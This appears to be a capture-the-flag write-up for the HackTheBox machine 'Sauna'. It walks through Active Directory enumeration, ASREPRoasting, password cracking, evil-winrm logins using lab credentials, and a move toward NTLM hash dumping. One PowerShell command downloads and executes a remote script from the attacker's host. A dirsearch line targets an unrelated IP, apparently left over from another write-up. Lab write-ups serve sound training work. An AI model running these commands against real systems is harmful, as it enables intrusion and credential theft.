Technology is just a tool. In terms of getting the kids working together and motivating them, the teacher is the most important. <Bill Gates>
03 Jan 2020
Sauna is an easy difficulty Windows machine from HacktheBox, it requires on the Active Directory enumeration technique and Kerberos attack, for training your ethical hacking skills and penetration testing skills.
Possible usernames can be found on the website that can be used on an ASREPRoasting attack. A password hash is found and the plaintext password was recovered by an offline brute force attack. This user credential is able to WinRM to the box.
Running WinPEAS reveals the possible path for the Privilege Escalation (PE), the result shows that there a system user has been configured to automatically log in and this user has Windows remote management permissions.
Nikto -- no vulnerability can be abused to bypass authentication.
1.2) Strategy 1 Check any hidden files/folders of the website
Cannot found any hidden files or folder of this website
python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://192.168.187.134/ -e php,txt -x 301,302,403,404 --simple-report=mrRobot.dirsearch
nmap -p 389 --script ldap-rootdse sauna.htb
Got some domain's background information
Windows Remote Management (WinRM)
It is a Windows built-in remote management protocol that was enabled by default. Using the evil-winrm to connect to the system
evil-winrm.rb -u fsmith -p Thestrokes23 -i sauna.htb
The user.txt file was found in the Desktop folder.
Hacking Process Part 3 – Windows Privilege Escalation
After gaining the initial access of the machine, a svc_loanmgr account was found under the c:\Users folder but the current account did not have access rights to read the folder
Enumerating the environment
The missing software patches for local privilege escalation vulnerabilities was not found using the Sherlock.ps script
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
According to the net user result above, this user was under the Remote Management Users group. Using the evil-winrm again to login
/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i sauna.htb
As this user svc_loanmgr was in the user group NTLM Authentication, tried to reveal the dump the NTLM hashes using the Impacket's secretsdump.py